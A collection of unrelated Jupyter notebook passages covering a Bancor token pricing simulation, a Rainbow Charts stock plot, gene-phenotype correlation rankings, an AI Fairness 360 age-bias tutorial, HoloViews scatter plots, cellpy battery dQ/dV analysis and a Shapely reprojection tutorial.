###########################################
# eoscon.price = 1
# eoscon.get_balanceValue()
# find the supply of HORUS on the EOS MAINNET
# $ cleos --url https://api.eosnewyork.io:443 get currency stats horustokenio "HORUS"
# {
# "HORUS": {
# "supply": "1200000000.0000 HORUS",
# "max_supply": "1200000000.0000 HORUS",
# "issuer": "horustokenio"
# }
HORUSsupply = 1000.0000
HORUScirc = 1000.0000
# horus_supply = np.linspace(1000,2000,1000)
horus = smart_token("HORUS", HORUScirc, HORUSsupply)
EOSbalance = 250 #0.5*bancor.get_tokmarketcap(horus,eoscon) # this creates a CW of 0.50
eos = connector("EOS",EOSbalance)
CW = 0.50
exchange = BancorExchange(CW)
print("TOKsupply:\t", horus.supply)
print("EOSbalance\t", eos.balance)
CTOKrecieved = 10
for i in list(range(10)):
TOKissued = exchange.CTOKtoTOK(tok=horus,ctok=eos,CTOKreceived=CTOKrecieved)
print()
print("TOK Issued:\t", TOKissued)
print("TOKsupply:\t", horus.supply)
print("EOSbalance:\t", eos.balance)
print("CW:\t\t", exchange.CW)
print("Effective Price: ", exchange.effective_price)
```
## Conclusion:
The example above works pefectly according to the whitepaper.
### Test: EOS->HORUS
Start with an initial balance of 2000 HORUS and 250 EOS and observe how the price of HORUS changes with each exchange from EOS to Horus.
```
import numpy as np
import matplotlib.pyplot as plt
for CW in [0.1, 0.25, 0.50, 0.75, 0.90]:
ex = BancorExchange(CW)
HORUSsupply = 2000.0000
HORUScirc = 2000.0000
# horus_supply = np.linspace(1000,2000,1000)
horus = smart_token("HORUS", HORUScirc, HORUSsupply)
EOSbalance = 250 #0.5*bancor.get_tokmarketcap(horus,eoscon) # this creates a CW of 0.50
eos = connector("EOS",EOSbalance)
price = []
hsupplylist = []
hsupply = horus.supply
while (hsupply > 1000):
# print("TOKsupply:\t", horus.supply)
# print("EOSbalance\t", eos.balance)
CTOKrecieved = 10
TOKissued = ex.CTOKtoTOK(tok=horus,ctok=eos,CTOKreceived=CTOKrecieved)
hsupplylist.append(horus.supply)
# price.append(ex.price)
price.append(1/ex.price) # flip units to [Horus/EOS]. Correct?
hsupply = horus.supply
plt.figure(figsize=(10,4))
plt.plot(hsupplylist, price,'r', linewidth=2,label="CW= "+str(CW))
plt.title("Pricing vs TOK Supply")
plt.legend()
plt.ylabel("Price [CTOK/TOK]")
plt.xlabel("Supply [TOK]")
# plt.axis([900,2100,0,1.5])
plt.grid(True)
plt.show()
```
### Test: HORUS->EOS
Start with an initial balance of 1000 HORUS and 250 EOS and observe how the price of HORUS changes with each exchange from HORUS to EOS.
```
import numpy as np
import matplotlib.pyplot as plt
for CW in [0.1, 0.25, 0.50, 0.75, 0.90]:
ex = BancorExchange(CW)
HORUSsupply = 2000.0000
HORUScirc = 1000.0000
# horus_supply = np.linspace(1000,2000,1000)
horus = smart_token("HORUS", HORUScirc, HORUSsupply)
EOSbalance = 250 #0.5*bancor.get_tokmarketcap(horus,eoscon) # this creates a CW of 0.50
eos = connector("EOS",EOSbalance)
price = []
hsupplylist = []
hsupply = horus.supply
while (hsupply < 2000):
TOKrecieved = 10
CTOKissued = ex.TOKtoCTOK(tok=horus, ctok=eos, TOKreceived=TOKrecieved)
# print(CTOKissued)
hsupplylist.append(horus.supply)
# price.append(ex.price)
price.append(1/ex.price) # this flips the units to [Horus/EOS]. Correct?
hsupply = horus.supply
plt.figure(figsize=(10,4))
plt.plot(hsupplylist, price,'r', linewidth=2,label="CW= "+str(CW))
plt.title("Pricing vs TOK Supply")
plt.legend()
plt.ylabel("Price [CTOK/TOK]")
plt.xlabel("Supply [TOK]")
# plt.axis([900,2100,0,1.5])
plt.grid(True)
plt.show()
```
## Conclusion
The basics of the bancor algorithm are listed above. These plots don't quite match the Bancor whitepaper exactly so we should see where their algorithm differs from ours. Some of the initial balance values will make the plots differ in their scale, but the share should be similar.
### ToDo:
* Incorporate the 10 day time lag into the formula
* Produce some test cases to make sure the algorithm works
* code it up in EOS!
| github_jupyter |
# Rainbow Charts
http://www.binarytribune.com/forex-trading-indicators/rainbow-charts
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
# fix_yahoo_finance is used to fetch data
import fix_yahoo_finance as yf
yf.pdr_override()
# input
symbol = 'AAPL'
start = '2018-08-01'
end = '2019-01-01'
# Read data
df = yf.download(symbol,start,end)
# View Columns
df.head()
# R=red, O=orange, Y=yellow, G=green, B=blue, I = indigo, and V=violet
df['Red'] = df['Adj Close'].rolling(2).mean()
df['Orange'] = df['Red'].rolling(2).mean()
df['Yellow'] = df['Orange'].rolling(2).mean()
df['Green'] = df['Yellow'].rolling(2).mean()
df['Blue'] = df['Green'].rolling(2).mean()
df['Indigo'] = df['Blue'].rolling(2).mean()
df['Violet'] = df['Indigo'].rolling(2).mean()
df = df.dropna()
colors = ['k','r', 'orange', 'yellow', 'g', 'b', 'indigo', 'violet']
df[['Adj Close','Red','Orange','Yellow','Green','Blue','Indigo','Violet']].plot(colors=colors, figsize=(18,12))
plt.fill_between(df.index, df['Low'], df['High'], color='grey', alpha=0.4)
plt.plot(df['Low'], c='darkred', linestyle='--', drawstyle="steps")
plt.plot(df['High'], c='forestgreen', linestyle='--', drawstyle="steps")
plt.title('Rainbow Charts')
plt.legend(loc='best')
plt.xlabel('Date')
plt.ylabel('Price')
plt.show()
```
## Candlestick with Rainbow
```
from matplotlib import dates as mdates
import datetime as dt
dfc = df.copy()
dfc['VolumePositive'] = dfc['Open'] < dfc['Adj Close']
#dfc = dfc.dropna()
dfc = dfc.reset_index()
dfc['Date'] = mdates.date2num(dfc['Date'].astype(dt.date))
dfc.head()
from mpl_finance import candlestick_ohlc
fig, ax1 = plt.subplots(figsize=(20,12))
candlestick_ohlc(ax1,dfc.values, width=0.5, colorup='g', colordown='r', alpha=1.0)
#colors = ['red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet']
#labels = ['Red', 'Orange', 'Yellow', 'Green', 'Blue', 'Indigo', 'Violet']
for i in dfc[['Red', 'Orange', 'Yellow', 'Green', 'Blue', 'Indigo', 'Violet']]:
ax1.plot(dfc['Date'], dfc[i], color=i, label=i)
ax1.xaxis_date()
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%d-%m-%Y'))
ax1.grid(True, which='both')
ax1.minorticks_on()
ax1v = ax1.twinx()
colors = dfc.VolumePositive.map({True: 'g', False: 'r'})
ax1v.bar(dfc.Date, dfc['Volume'], color=colors, alpha=0.4)
ax1v.axes.yaxis.set_ticklabels([])
ax1v.set_ylim(0, 3*df.Volume.max())
ax1.set_title('Stock '+ symbol +' Closing Price')
ax1.set_ylabel('Price')
ax1.set_xlabel('Date')
ax1.legend(loc='best')
```
| github_jupyter |
# Correlation-based gene rankings
We compute the correlation coeffients between each gene and each phenotype - we then average across all phenotypes.
```
import gc
import h5py
import numpy as np
import pandas as pd
import os
import statsmodels.api as sm
from scipy import stats
from scipy.stats import spearmanr, pearsonr, rankdata
import matplotlib
import pickle
import sys
from matplotlib import pyplot as plt
import matplotlib as mpl
%matplotlib inline
import seaborn as sns
from functools import reduce
import numpy.ma as ma
path_to_configs = "../"
sys.path.append(path_to_configs)
from configs import *
with h5py.File(path_to_configs + path_to_MDAD_data_folders + "ACT_MSBBRNA_ROSMAP.h5", 'r') as hf:
gene_symbols = hf["gene_symbols"][:].astype(str)
ge = hf["ge"][:]
Y = hf["labels"][:]
labels_names= hf["labels_names"][:].astype(str)
print(list(hf.keys()))
labels_df = pd.DataFrame(Y, columns=labels_names.astype(str), dtype="str")
path_to_save_scores = path_to_save_scores = path_to_configs + path_to_gene_rankings + "Correlations/"
phenotypes = ["CERAD", "BRAAK", "PLAQUES", "TANGLES", "ABETA_IHC", "TAU_IHC"]
rs_phen = {}
ps_phen = {}
for phenotype in phenotypes:
print(phenotype)
a=ma.masked_invalid(labels_df[phenotype].astype(float))
rs = []
ps = []
for row in ge.T:
b=ma.masked_invalid(row)
msk = (~a.mask & ~b.mask)
r,p = stats.pearsonr(a[msk],b[msk])
rs.append(r)
ps.append(p)
rs_phen[phenotype]=rs
ps_phen[phenotype]=ps
phen_dict = {"all": ['CERAD','BRAAK','PLAQUES','TANGLES','ABETA_IHC','TAU_IHC'],
"abeta": ['CERAD','PLAQUES','ABETA_IHC'],
"tau": ['BRAAK','TANGLES','TAU_IHC']}
RANK_DF = pd.DataFrame.from_dict(rs_phen)
RANK_DF["gene"] = gene_symbols
for phen in phenotypes:
RANK_DF["%s_percentiles"%phen] = RANK_DF[phen].rank(pct=True)
for phen_group in phen_dict:
RANK_DF["%s-related_score"%phen_group] = RANK_DF[["%s_percentiles"%x for x in phen_dict[phen_group]]].mean(axis=1).rank(pct=True)
RANK_DF["%s-related_score"%phen_group] = RANK_DF["%s-related_score"%phen_group] - np.min(RANK_DF["%s-related_score"%phen_group])
### SAVE rnk FILES (used for gseapy)
### SAVE FINAL RANKINGS FOR EACH PHENOTYPE AND COMBINED ACROSS GROUPS
if not os.path.isdir(path_to_save_scores):
os.makedirs(path_to_save_scores)
for p_group in ["all", "abeta", "tau"]:
scores_df = RANK_DF[["gene","%s-related_score"%p_group]].sort_values("%s-related_score"%p_group, ascending=False)
scores_df = scores_df.reset_index(drop=True)
scores_df.to_csv("%s%s-related.rnk"%(path_to_save_scores,p_group), sep="\t", header=False, index=False)
RANK_DF.to_csv(path_to_save_scores + "ALL_CONSENSUS_SCORES.csv")
print("Saved rankings to %s"%path_to_save_scores)
```
| github_jupyter |
# Detecting and mitigating age bias on credit decisions
The goal of this tutorial is to introduce the basic functionality of AI Fairness 360 to an interested developer who may not have a background in bias detection and mitigation.
### Biases and Machine Learning
A machine learning model makes predictions of an outcome for a particular instance. (Given an instance of a loan application, predict if the applicant will repay the loan.) The model makes these predictions based on a training dataset, where many other instances (other loan applications) and actual outcomes (whether they repaid) are provided. Thus, a machine learning algorithm will attempt to find patterns, or generalizations, in the training dataset to use when a prediction for a new instance is needed. (For example, one pattern it might discover is "if a person has salary > USD 40K and has outstanding debt < USD 5, they will repay the loan".) In many domains this technique, called supervised machine learning, has worked very well.
However, sometimes the patterns that are found may not be desirable or may even be illegal. For example, a loan repay model may determine that age plays a significant role in the prediction of repayment because the training dataset happened to have better repayment for one age group than for another. This raises two problems: 1) the training dataset may not be representative of the true population of people of all age groups, and 2) even if it is representative, it is illegal to base any decision on a applicant's age, regardless of whether this is a good prediction based on historical data.
AI Fairness 360 is designed to help address this problem with _fairness metrics_ and _bias mitigators_. Fairness metrics can be used to check for bias in machine learning workflows. Bias mitigators can be used to overcome bias in the workflow to produce a more fair outcome.
The loan scenario describes an intuitive example of illegal bias. However, not all undesirable bias in machine learning is illegal it may also exist in more subtle ways. For example, a loan company may want a diverse portfolio of customers across all income levels, and thus, will deem it undesirable if they are making more loans to high income levels over low income levels. Although this is not illegal or unethical, it is undesirable for the company's strategy.
As these two examples illustrate, a bias detection and/or mitigation toolkit needs to be tailored to the particular bias of interest. More specifically, it needs to know the attribute or attributes, called _protected atrributes_, that are of interest: race is one example of a _protected attribute_ and income level is a second.
### The Machine Learning Workflow
To understand how bias can enter a machine learning model, we first review the basics of how a model is created in a supervised machine learning process.

First, the process starts with a _training dataset_, which contains a sequence of instances, where each instance has two components: the features and the correct prediction for those features. Next, a machine learning algorithm is trained on this training dataset to produce a machine learning model. This generated model can be used to make a prediction when given a new instance. A second dataset with features and correct predictions, called a _test dataset_, is used to assess the accuracy of the model.
Since this test dataset is the same format as the training dataset, a set of instances of features and prediction pairs, often these two datasets derive from the same initial dataset. A random partitioning algorithm is used to split the initial dataset into training and test datasets.
Bias can enter the system in any of the three steps above. The training data set may be biased in that its outcomes may be biased towards particular kinds of instances. The algorithm that creates the model may be biased in that it may generate models that are weighted towards particular features in the input. The test data set may be biased in that it has expectations on correct answers that may be biased. These three points in the machine learning process represent points for testing and mitigating bias. In AI Fairness 360 codebase, we call these points _pre-processing_, _in-processing_, and _post-processing_.
### AI Fairness 360
We are now ready to utilize AI Fairness 360 (aif360) to detect and mitigate bias. We will use the German credit dataset, splitting it into a training and test dataset. We will look for bias in the creation of a machine learning model to predict if an applicant should be given credit based on various features from a typical credit application. The protected attribute will be "Age", with "1" and "0" being the values for the privileged and unprivileged groups, respectively.
For this first tutorial, we will check for bias in the initial training data, mitigate the bias, and recheck. More sophisticated machine learning workflows are given in the author tutorials and demo notebooks in the codebase.
Here are the steps involved
1. Import the aif360 toolkit and install it
1. Write import statements
1. Set bias detection options, load dataset, and split between train and test
1. Compute fairness metric on original training dataset
1. Mitigate bias by transforming the original dataset
1. Compute fairness metric on transformed training dataset
### Step 1
We'll install the aif360 toolkit
```
!pip install aif360
```
### Step 2
As with any python program, the first step will be to import the necessary packages. Below we import several components from the aif360 package. We import metrics to check for bias, and classes related to the algorithm we will use to mitigate bias. We also import some other non-aif360 useful packages.
```
!pip install cvxpy==0.4.11
# %matplotlib inline
# Load all necessary packages
import numpy
from aif360.datasets import GermanDataset
from aif360.metrics import BinaryLabelDatasetMetric
from aif360.algorithms.preprocessing.optim_preproc import OptimPreproc
from aif360.algorithms.preprocessing.optim_preproc_helpers.data_preproc_functions\
import load_preproc_data_german
from aif360.algorithms.preprocessing.optim_preproc_helpers.distortion_functions\
import get_distortion_german
from aif360.algorithms.preprocessing.optim_preproc_helpers.opt_tools import OptTools
# from common_utils import compute_metrics
# from aif360.datasets import BinaryLabelDataset
# from aif360.metrics.utils import compute_boolean_conditioning_vector
from IPython.display import Markdown, display
```
### Step 3 Load dataset, specifying protected attribute, and split dataset into train and test
In Step 3 we begin by dowloading the dataset. Then we load the initial dataset, setting the protected attribute to be age. We then split the original dataset into training and testing datasets. Note that we use a random seed number for this demonstration, which gives us the same result for each split().
Although we will use only the training dataset in this tutorial, a normal workflow would also use a test dataset for assessing the efficacy (accuracy, fairness, etc.) during the development of a machine learning model.
Finally, we set two variables (to be used in Step 3) for the privileged (1) and unprivileged (0) values for the age attribute. These are key inputs for detecting and mitigating bias, which will be Step 3 and Step 4.
```
aif360_location = !python -c "from distutils.sysconfig import get_python_lib; print(get_python_lib())"
import os
install_loc = os.path.join(aif360_location[0], "aif360/data/raw/german/")
%cd $install_loc
!wget ftp://ftp.ics.uci.edu/pub/machine-learning-databases/statlog/german/german.data
!wget ftp://ftp.ics.uci.edu/pub/machine-learning-databases/statlog/german/german.doc
%cd -
dataset_orig = load_preproc_data_german(['age'])
numpy.random.seed(27)
dataset_orig_train, dataset_orig_test = dataset_orig.split([0.7], shuffle=True)
privileged_groups = [{'age': 1}]
unprivileged_groups = [{'age': 0}]
```
### Step 4 Compute fairness metric on original training dataset
Now that we've identified the protected attribute 'age' and defined privileged and unprivileged values, we can use aif360 to detect bias in the dataset. One simple test is to compare the percentage of favorable results for the privileged and unprivileged groups, subtracting the former percentage from the latter. A negative value indicates less favorable outcomes for the unprivileged groups. This is implemented in the method called mean_difference on the BinaryLabelDatasetMetric class. The code below performs this check and displays the output, showing that the difference is -0.102466
```
metric_orig_train = BinaryLabelDatasetMetric(dataset_orig_train,
unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
display(Markdown("#### Original training dataset"))
print("Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_orig_train.mean_difference())
```
### Step 5 Mitigate bias by transforming the original dataset
The previous step showed that the privileged group was getting 10.2% more positive outcomes in the training dataset. Since this is not desirable, we are going to try to mitigate this bias in the training dataset. As stated above, this is called _pre-processing_ mitigation because it happens before the creation of the model.
AI Fairness 360 implements several pre-processing mitigation algorithms. We will choose the Optimized Preprocess algorithm [1], which is implemented in "OptimPreproc" class in the "aif360.algorithms.preprocessing" directory. This algorithm will transform the dataset to have more equity in positive outcomes on the protected attribute for the privileged and unprivileged groups.
The algorithm requires some tuning parameters, which are set in the optim_options variable and passed as an argument along with some other parameters, including the 2 variables containg the unprivileged and privileged groups defined in Step 3.
We then call the fit and transform methods to perform the transformation, producing a newly transformed training dataset (dataset_transf_train). Finally, we ensure alignment of features between the transformed and the original dataset to enable comparisons.
[1] Optimized Pre-Processing for Discrimination Prevention, NIPS 2017, Flavio Calmon, Dennis Wei, Bhanukiran Vinzamuri, Karthikeyan Natesan Ramamurthy, and Kush R. Varshney
```
optim_options = {
"distortion_fun": get_distortion_german,
"epsilon": 0.1,
"clist": [0.99, 1.99, 2.99],
"dlist": [.1, 0.05, 0]
}
OP = OptimPreproc(OptTools, optim_options,
unprivileged_groups = unprivileged_groups,
privileged_groups = privileged_groups)
OP = OP.fit(dataset_orig_train)
dataset_transf_train = OP.transform(dataset_orig_train, transform_Y = True)
dataset_transf_train = dataset_orig_train.align_datasets(dataset_transf_train)
```
### Step 6 Compute fairness metric on transformed dataset
Now that we have a transformed dataset, we can check how effective it was in removing bias by using the same metric we used for the original training dataset in Step 4. Once again, we use the function mean_difference in the BinaryLabelDatasetMetric class. We see the mitigation step was very effective, the difference in mean outcomes is now 0.001276 . So we went from a 10.2% advantage for the privileged group to a 0.1% advantage for the unprivileged group.
```
metric_transf_train = BinaryLabelDatasetMetric(dataset_transf_train,
unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
display(Markdown("#### Transformed training dataset"))
print("Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_transf_train.mean_difference())
```
### Summary
The purpose of this tutorial is to give a new user to bias detection and mitigation a gentle introduction to some of the functionality of AI Fairness 360. A more complete use case would take the next step and see how the transformed dataset impacts the accuracy and fairness of a trained model. This is implemented in the demo notebook in the examples directory of toolkit, called demo_optim_data_preproc.ipynb. I highly encourage readers to view that notebook as it is generalization and extension of this simple tutorial.
There are many metrics one can use to detect the pressence of bias. AI Fairness 360 provides many of them for your use. Since it is not clear which of these metrics to use, we also provide some guidance. Likewise, there are many different bias mitigation algorithms one can employ, many of which are in AI Fairness 360. Other tutorials will demonstrate the use of some of these metrics and mitigations algorithms.
As mentioned earlier, both fairness metrics and mitigation algorithms can be performed at various stages of the machine learning pipeline. We recommend checking for bias as often as possible, using as many metrics are relevant for the application domain. We also recommend incorporating bias detection in an automated continouus integration pipeline to ensure bias awareness as a software project evolves.
| github_jupyter |
<div class="contentcontainer med left" style="margin-left: -50px;">
<dl class="dl-horizontal">
<dt>Title</dt> <dd> Scatter Element</dd>
<dt>Dependencies</dt> <dd>Bokeh</dd>
<dt>Backends</dt>
<dd><a href='./Scatter.ipynb'>Bokeh</a></dd>
<dd><a href='../matplotlib/Scatter.ipynb'>Matplotlib</a></dd>
<dd><a href='../plotly/Scatter.ipynb'>Plotly</a></dd>
</dl>
</div>
```
import numpy as np
import holoviews as hv
from holoviews import dim
hv.extension('bokeh')
```
The ``Scatter`` element visualizes as markers placed in a space of one independent variable, traditionally denoted as *x*, against a dependent variable, traditionally denoted as *y*. In HoloViews, the name ``'x'`` is the default dimension name used in the key dimensions (``kdims``) and ``'y'`` is the default dimension name used in the value dimensions (``vdims``). We can see this from the default axis labels when visualizing a simple ``Scatter`` element:
```
np.random.seed(42)
coords = [(i, np.random.random()) for i in range(20)]
scatter = hv.Scatter(coords)
scatter.opts(color='k', marker='s', size=10)
```
Here the random *y* values are considered to be the 'data' whereas the x positions express where those values are located (compare this to how [``Points``](./Points.ipynb) elements are defined). In this sense, ``Scatter`` can be thought of as a [``Curve``](./Curve.ipynb) without any lines connecting the samples and you can use slicing to view the *y* values corresponding to a chosen *x* range:
```
scatter[0:12] + scatter[12:20]
```
A ``Scatter`` element must always have at least one value dimension but that doesn't mean additional value dimensions aren't supported. Here is an example with two additional quantities for each point, declared as the ``vdims`` ``'z'`` and ``'size'`` visualized as the color and size of the dots, respectively:
```
np.random.seed(10)
data = np.random.rand(100,4)
scatter = hv.Scatter(data, vdims=['y', 'z', 'size'])
scatter = scatter.opts(color='z', size=dim('size')*20)
scatter + scatter[0.3:0.7, 0.3:0.7].hist('z')
```
In the right subplot, the ``hist`` method is used to show the distribution of samples along our first value dimension, (``'y'``).
The marker shape specified above can be any supported by [matplotlib](http://matplotlib.org/api/markers_api.html), e.g. ``s``, ``d``, or ``o``; the other options select the color and size of the marker. For convenience with the [bokeh backend](../../../user_guide/Plotting_with_Bokeh.ipynb), the matplotlib marker options are supported using a compatibility function in HoloViews.
**Note**: Although the ``Scatter`` element is superficially similar to the [``Points``](./Points.ipynb) element (they can generate plots that look identical), the two element types are semantically quite different: ``Points`` are used to visualize data where the *y* variable is *dependent*. This semantic difference also explains why the histogram generated by ``hist`` call above visualizes the distribution of a different dimension than it does for [``Points``](./Points.ipynb).
This difference means that ``Scatter`` naturally combine elements that express dependent variables in two-dimensional space such as the ``Chart`` types, such as [``Curve``](./Curve.ipynb). Similarly, ``Points`` express a independent relationship in two-dimensions and combine naturally with [``Raster``](./Raster.ipynb) types such as [``Image``](./Image.ipynb).
For full documentation and the available style and plot options, use ``hv.help(hv.Scatter).``
| github_jupyter |
# Processing cellpy batch - ica
### `{{cookiecutter.project_name}}::{{cookiecutter.session_id}}`
**Experimental-id:** `{{cookiecutter.notebook_name}}`
**Short-name:** `{{cookiecutter.session_id}}`
**Project:** `{{cookiecutter.project_name}}`
**By:** `{{cookiecutter.author_name}}`
**Date:** `{{cookiecutter.date}}`
## Imports and setup
```
import os
import pathlib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import holoviews as hv
from holoviews.core.io import Pickler, Unpickler
import hvplot.pandas
from holoviews import opts
import cellpy
from cellpy import prms
from cellpy import prmreader
from cellpy.utils import batch, helpers, plotutils, ica
%matplotlib inline
hv.extension('bokeh')
pd.set_option('display.max_columns', 70)
print(f"cellpy version: {cellpy.__version__}")
cellpy_batch_file = "cellpy_batch_" + "{{cookiecutter.session_id}}" + ".json"
b = batch.from_journal(cellpy_batch_file)
b.link()
cell_labels = b.experiment.cell_names
print(" cell labels: ")
cell_labels
# # Remove bad cycles (if you have saved it to the journal session)
# helpers.yank_outliers(b, remove_indexes=b.journal.session["bad_cycles"])
# # It is usually nice to see the capacity plot in the same notebook.
# # You can use the b.plot_summary() method or plotutils.bplot e.g.
# plotutils.bplot(b, columns=["charge_capacity"], max_cycle=100)
```
## Plotting
This will output an interactive ica plot for 100 first cycles for each cell.
```
ica_curves = dict()
cycles = range(1, 101)
for label in b.experiment.cell_names:
print(label)
d = b.experiment.data[label]
try:
tidy_ica = ica.dqdv_frames(d, cycle=cycles, voltage_resolution=0.005)
except:
print(f"[{label} unsuccessfull]")
else:
ica_curve = hv.Curve(tidy_ica, kdims=['voltage', 'cycle'], vdims=['dq'], label="Incremental capacity plot").groupby("cycle").overlay().opts(show_legend=False)
ica_curves[label] = ica_curve
NdLayout_ica = hv.NdLayout(ica_curves, kdims='label').cols(3)
palette = 'Spectral'
NdLayout_ica.opts(
hv.opts.Curve(color=hv.Palette(palette), tools=['hover'], xlim=(0.05,0.8)),
hv.opts.NdOverlay(shared_axes=False),
hv.opts.NdLayout()
)
```
## Tweaking dQ/dV parameters
```
cell_id = b.experiment.cell_names[0]
c = b.experiment.data[cell_id]
cycle_number = 4
cycle = c.get_cap(cycle=cycle_number, categorical_column=True, method="forth-and-forth", insert_nan=False)
voltage_1, incremental_1 = ica.dqdv_cycle(cycle)
curve1 = hv.Curve((voltage_1, incremental_1), label="one").opts(width=800, xlabel="Voltage", ylabel="dqdv")
curve1
voltage_2, incremental_2 = ica.dqdv_cycle(cycle, voltage_resolution=0.01)
curve2 = hv.Curve((voltage_2, incremental_2), label="two").opts(width=800, xlabel="Voltage", ylabel="dqdv")
curve1 * curve2
```
## Making and saving dQ/dV to html and pickle for later use
```
cell_id = b.experiment.cell_names[0]
c = b.experiment.data[cell_id]
cycle = [1,2, 10, 20]
tidy_ica = ica.dqdv_frames(c, cycle=cycles, voltage_resolution=0.005, normalizing_factor=1)
curves = hv.Curve(tidy_ica, kdims=['voltage', 'cycle'], vdims=['dq']).groupby("cycle").overlay()
# setting options using the hv.opts API
curves.opts(
hv.opts.Curve(
color=hv.Cycle('Category20'),
),
hv.opts.NdOverlay(
title=f"Evolution [{cell_id}]",
show_legend=True,
legend_position="right",
width=600,
xlim=(0, 1),
ylim=(-10, 5),
ylabel="dQ/dV",
),
)
fig_label = f"{{cookiecutter.session_id}}_{cell_id}_ica_evolution"
# export to html:
hv.save(
curves,
f"out/{fig_label}.html",
toolbar=True
)
# save as pickle (can be loaded in other notebooks)
Pickler.save(curves, f"out/{fig_label}.hvz",)
```
## Saving dQ/dV to csv files
This can be usefull for plotting with another plotting software
```
# Saving the dQ/dV data for the three first cycles (formation) for all cells except the last
out = pathlib.Path("data/processed")
ica_curves = dict()
cycles = [1,2,3]
selected_cell_labels = cell_labels[:-1] # skipping the last cell
for label in selected_cell_labels:
print(label)
d = b.experiment.data[label]
try:
wide_ica = ica.dqdv_frames(d, cycle=cycles, voltage_resolution=0.005, tidy=False)
except:
print(f"[{label} unsuccessfull]")
else:
fname = f"{label}_ica_formation.csv"
wide_ica.to_csv(out / fname, sep=";", index=False)
print(f" -> saved to {out / fname}")
```
## Links
### Notebooks
- notes and information [link](00_{{cookiecutter.notebook_name}}_notes.ipynb)
- processing raw data [link](01_{{cookiecutter.notebook_name}}_loader.ipynb)
- life [link](02_{{cookiecutter.notebook_name}}_life.ipynb)
- cycles [link](03_{{cookiecutter.notebook_name}}_cycles.ipynb)
- ica [link](04_{{cookiecutter.notebook_name}}_ica.ipynb)
- plots [link](05_{{cookiecutter.notebook_name}}_plots.ipynb)
| github_jupyter |
# Geospatial operations with Shapely: Round-Trip Reprojection, Affine Transformations, Rasterisation, and Vectorisation
Sometimes we want to take a geospatial object and transform it to a new coordinate system, and perhaps translate and rotate it by some amount. We may want to rasterise the object for raster operations. We'd like to do this all with Shapely geometry object so we have access to all their useful methods.
```
import json, geojson, pyproj
from shapely import geometry
from shapely.ops import transform
from shapely.affinity import affine_transform
from functools import partial
from skimage import measure
from scipy.ndimage.morphology import binary_dilation
from PIL import Image, ImageDraw
import numpy as np
import matplotlib.pyplot as plt
```
## Reprojection-Affine-Rasterisation roundtrip
We're going to:
- take a shapely polygon with lon/lat coordinates, say the building footprint of the Oxford School of Geography and the Environment (SOGE)
- convert it to UTM coordinates
- draw it on a 1km raster with Oxford's Carfax tower landmarking the bottom left corner.
```
# grab a quick geojson from geojson.io
feature = json.loads("""{
"type": "Feature",
"properties": {},
"geometry": {
"type": "Polygon",
"coordinates": [
[
[
-1.2537717819213867,
51.75935044524217
],
[
-1.2541741132736204,
51.75922759060092
],
[
-1.2538844347000122,
51.75860999193512
],
[
-1.2542277574539185,
51.75844728980553
],
[
-1.2540507316589353,
51.75822813907169
],
[
-1.2531226873397827,
51.75858342836217
],
[
-1.2537717819213867,
51.75935044524217
]
]
]
}
}""")
# load the polygon:
SOGE = geometry.shape(feature['geometry'])
```
### Forward and Reverse Projection
We want to convert the geometry from lon/lat to a cartesian coordinate system. Let's use Universal Transfer Mercator with units in m. The UTM projection is arranged in 'zones' to keep angles and shapes conformal in images.
```
# A function to grab the UTM zone number for any lat/lon location
def get_utm_zone(lat,lon):
zone_str = str(int((lon + 180)/6) + 1)
if ((lat>=56.) & (lat<64.) & (lon >=3.) & (lon <12.)):
zone_str = '32'
elif ((lat >= 72.) & (lat <84.)):
if ((lon >=0.) & (lon<9.)):
zone_str = '31'
elif ((lon >=9.) & (lon<21.)):
zone_str = '33'
elif ((lon >=21.) & (lon<33.)):
zone_str = '35'
elif ((lon >=33.) & (lon<42.)):
zone_str = '37'
return zone_str
# get the UTM zone using the centroid of the polygon
utm_zone = get_utm_zone(SOGE.centroid.y, SOGE.centroid.x)
# define the native WGS84 lon/lat projection
proj_wgs = pyproj.Proj("+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs")
# define the UTM projection using the utm zone
proj_utm = pyproj.Proj(proj='utm',zone=utm_zone,ellps='WGS84')
# create reprojection functions using functools.partial
reproj_wgs_utm = partial(pyproj.transform, proj_wgs, proj_utm)
reproj_utm_wgs = partial(pyproj.transform, proj_utm, proj_wgs)
# use shapely.transform with the reprojection functions to reproject shapely objects
SOGE_utm = transform(reproj_wgs_utm, SOGE)
# Check the reverse transform with a tolerance of 1e-9 of a decimal degree
print (SOGE.almost_equals(transform(reproj_utm_wgs, SOGE_utm), 1e-9))
```
### Affine Transformation
Now lets say we want to get a sense of the footprint of the School of Geograpy on a square kilometer of Oxford, with the bottom left corner centered on Carfax tower. We want to create a mask of the building footprint on a numpy array.
<div>
<img src="https://user-images.githubusercontent.com/22874837/74949464-b52dec00-53f5-11ea-9107-53d91c93d70c.png" width="500"/>
</div>
```
# Point for Carfax tower
carfax = geometry.Point(-1.25812, 51.7519)
# Convert the point to utm
carfax_utm = transform(reproj_wgs_utm,carfax)
# use the utm point as the lower-left coordinate for a shapely box
oxford_box = geometry.box(carfax_utm.x, carfax_utm.y, carfax_utm.x+1000, carfax_utm.y+1000)
# visualise
fig, ax = plt.subplots(1,1,figsize=(4,4))
ax.plot(*SOGE_utm.exterior.xy,c='b')
ax.scatter(carfax_utm.x, carfax_utm.y, c='k')
ax.plot(*oxford_box.exterior.xy,c='g')
plt.show()
```
We'll choose the pixel resolution of our numpy array to be 25m. We'll use a [shapely affine tranformation](https://shapely.readthedocs.io/en/latest/manual.html#affine-transformations) with a geotransform to transform the shape to pixel coordinates. *Note!* The Shapely Geotransform matrix is different than many other spatial packages (e.g. GDAL, PostGIS).
```
# Define the geotransform matrix
a = e = 1/25 # stretch along-axis 25m/px
b = d = 0 # rotate across-axis 0m/px
x_off = - carfax_utm.x / 25 # offset from cartesian origin in pixel coordinates
y_off = - carfax_utm.y / 25 # offset from cartesian origin in pixel coordinates
GT = [a,b,d,e,x_off,y_off] # GeoTransform Matrix
# Apply GeoTransform
SOGE_pix = affine_transform(SOGE_utm,GT)
```
### Rasterising
